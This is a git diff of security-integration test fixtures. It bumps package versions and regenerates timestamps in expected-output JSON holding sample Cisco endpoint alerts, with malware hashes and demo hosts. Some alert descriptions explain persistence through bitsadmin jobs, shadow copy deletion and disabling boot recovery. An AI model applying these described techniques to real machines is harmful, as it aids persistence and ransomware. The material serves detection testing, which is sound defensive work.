@@ -1,12 +1,12 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "2012 Dec 18 14:51:08 Nexus5010-B %AUTHPRIV-3-SYSTEM_MSG: pam_aaa:Authentication failed for user en from 2.2.2.1 - login", "event": { - "ingested": "2021-09-07T13:06:42.303852400Z" + "ingested": "2021-12-14T14:40:31.302635869Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event"
diff --git a/packages/cisco_nexus/manifest.yml b/packages/cisco_nexus/manifest.yml
index 2c7e3457cb3..a1266259670 100644
--- a/packages/cisco_nexus/manifest.yml
+++ b/packages/cisco_nexus/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: cisco_nexus
 title: Cisco Nexus
-version: 0.3.0
+version: 0.3.1
 license: basic
 description: Collect logs from Cisco Nexus with Elastic Agent.
 type: integration
diff --git a/packages/cisco_secure_endpoint/changelog.yml b/packages/cisco_secure_endpoint/changelog.yml
index ae08da24345..24461fb4589 100644
--- a/packages/cisco_secure_endpoint/changelog.yml
+++ b/packages/cisco_secure_endpoint/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "0.2.2"
+  changes:
+    - description: Regenerate test files using the new GeoIP database
+      type: bugfix
+      link: https://github.com/elastic/integrations/pull/2339
 - version: "0.2.1"
   changes:
     - description: Change test public IPs to the supported subset
diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json
index 38cf5f7a80e..8dacb214120 100644
--- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json
@@ -38,7 +38,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:29.222399500Z", + "ingested": "2021-12-14T14:40:34.011380264Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\",\"sha1\":\"128aa78059540cf0cdae2a3cea30cd80e00f2046\",\"md5\":\"c877b67a5733c59d0d8ed8d519df0c91\"}}}}", "code": "553648147", "kind": "alert", 
@@ -104,7 +104,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:29.222408700Z", + "ingested": "2021-12-14T14:40:34.011383133Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533243623469744000,\"timestamp\":1610619329,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T10:15:29+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", 
@@ -193,7 +193,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222414700Z", + "ingested": "2021-12-14T14:40:34.011383723Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT657.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT657.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -271,7 +271,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222420600Z", + "ingested": "2021-12-14T14:40:34.011384163Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "code": "553648143", "kind": "alert", 
@@ -343,7 +343,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222426300Z", + "ingested": "2021-12-14T14:40:34.011384645Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -444,7 +444,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222431900Z", + "ingested": "2021-12-14T14:40:34.011385085Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"SqGGuYXyy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\SqGGuYXyy.exe\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -543,7 +543,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222437500Z", + "ingested": "2021-12-14T14:40:34.011385529Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT4BBF.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT4BBF.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -621,7 +621,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222443100Z", + "ingested": "2021-12-14T14:40:34.011385934Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "code": "553648143", "kind": "alert", 
@@ -700,7 +700,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222448800Z", + "ingested": "2021-12-14T14:40:34.011386403Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739875754000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":875739000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. 
This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.\",\"short_description\":\"W32.WScriptExecuteFakeExtension.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", "code": "1107296274", "kind": "alert", 
@@ -787,7 +787,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222454500Z", + "ingested": "2021-12-14T14:40:34.011386871Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739868158500,\"timestamp\":1610618750,\"timestamp_nanoseconds\":868146000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. 
Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.\",\"short_description\":\"W32.Bitsadmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"bitsadmin.exe\",\"file_path\":\"/C:/Windows/System32/bitsadmin.exe\",\"identity\":{\"sha256\":\"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"}}}}}", "code": "1107296274", "kind": "alert", 
@@ -874,7 +874,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222460200Z", + "ingested": "2021-12-14T14:40:34.011387280Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739846959000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":846943000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. 
This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.\",\"short_description\":\"W32.WScriptLaunchedZippedJS.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", "code": "1107296274", "kind": "alert", 
@@ -961,7 +961,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222464300Z", + "ingested": "2021-12-14T14:40:34.011387867Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576726048000300,\"timestamp\":1610618696,\"timestamp_nanoseconds\":48000000,\"date\":\"2021-01-14T10:04:56+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618696,\"start_date\":\"2021-01-14T10:04:56+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. 
Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"/C:/windows/system32/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", "code": "1107296274", "kind": "alert", 
@@ -1048,7 +1048,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:29.222469Z", + "ingested": "2021-12-14T14:40:34.011388410Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576727672000300,\"timestamp\":1610618689,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-14T10:04:49+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610618689,\"start_date\":\"2021-01-14T10:04:49+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. 
Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.\",\"short_description\":\"W32.BCDEditDisableRecovery.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}}", "code": "1107296274", "kind": "alert", 
@@ -1135,7 +1135,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222474300Z", + "ingested": "2021-12-14T14:40:34.011388818Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458617561791000300,\"timestamp\":1610618620,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T10:03:40+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618620,\"start_date\":\"2021-01-14T10:03:40+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.\",\"short_description\":\"W32.FakeExtensionExec.RET\"},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"/c:/users/rsteadman/downloads/report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}}}}", "code": "1107296274", "kind": "alert", 
